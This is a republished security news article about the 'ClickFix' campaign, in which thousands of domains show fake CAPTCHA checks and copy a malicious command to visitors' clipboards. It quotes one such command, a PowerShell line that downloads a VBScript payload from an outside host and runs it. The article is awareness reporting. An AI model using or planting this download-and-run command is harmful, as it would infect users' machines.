Hackers Acquire Over 13,000 Distinct Domains and Utilize Cloudflare for Clickfix Attacks

Try Our Free Tools!
Master the web with Free Tools that work as hard as you do. From Text Analysis to Website Management, we empower your digital journey with expert guidance and free, powerful tools.

Surge in Browser-Based Malware Campaign: ClickFix

In the middle of 2025, researchers from Lab539 identified a significant escalation in a novel browser-based malware initiative named “ClickFix.”

First surfacing in July, this threat quickly broadened its influence by registering over 13,000 distinct domains, each designed to entice users into executing harmful commands on their devices.

The campaign exploits compromised or low-cost hosting solutions, with a substantial fraction operating behind Cloudflare, to deliver payloads through deceptively innocuous web prompts.

Individuals visiting these malicious sites encounter a CAPTCHA challenge before being coerced into executing a command copied to their clipboard, thereby granting attackers the capacity to deploy arbitrary scripts or executables.

Initially, the proliferation of ClickFix domains appeared rather insignificant in the expansive landscape of cyber threats.

However, as of mid-August, an alarming increase caught the attention of numerous threat-intelligence platforms.

Lab539 analysts reported a sudden emergence of front-end sites that obscure malware delivery under the guise of “verification” processes, a feature that sets ClickFix apart from traditional phishing or watering-hole attacks.

The extensive domain registrations implied an automated provisioning process, likely fueled by pay-as-you-go registrar services and resold hosting, as opposed to the manual configurations typically seen with advanced persistent threat actors.

Despite Cloudflare’s significant role, accounting for approximately 24% of the identified ClickFix domains, the campaign’s extensive range includes nearly 500 alternative providers, highlighting a strategic diversification of infrastructure to bypass simplistic blocklists.

Notably, regional VPS services from the United States, Germany, Indonesia, and Brazil have been prominently featured, indicating both global outreach and opportunistic compromises of third-party servers.

In many instances, attackers have repurposed outdated or improperly configured subdomains—some linked to decades-old academic or municipal hosts—to merge malicious traffic with legitimate DNS records.

Infection Mechanism and Payload Delivery

The primary infection mechanism capitalizes on the browser’s clipboard API, surreptitiously inserting a command that users inadvertently paste into a terminal.

Hackers Use Covert Malware to Access Admin Controls on WordPress Websites

Upon CAPTCHA completion, the site transcribes a PowerShell command sequence to the clipboard. For instance:

cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbs

This single command line downloads and executes a VBScript payload without requiring any additional user interaction, illustrating the campaign’s reliance on social engineering over complex exploitation.

Variants include direct executable downloads and obfuscated scripts, indicating multiple operators leveraging the ClickFix framework.

The prevalence of this method underscores how minimal technical expertise can still result in vast intrusion opportunities when combined with automated domain registration and global hosting resources.

Source link: Cybersecuritynews.com.

Disclosure: This article is for general information only and is based on publicly available sources. We aim for accuracy but can't guarantee it. The views expressed are the author's and may not reflect those of the publication. Some content was created with help from AI and reviewed by a human for clarity and accuracy. We value transparency and encourage readers to verify important details. This article may include affiliate links. If you buy something through them, we may earn a small commission — at no extra cost to you. All information is carefully selected and reviewed to ensure it's helpful and trustworthy.

Reported By

RS Web Solutions

We provide the best tutorials, reviews, and recommendations on all technology and open-source web-related topics. Surf our site to extend your knowledge base on the latest web trends.
Share the Love
Related News Worth Reading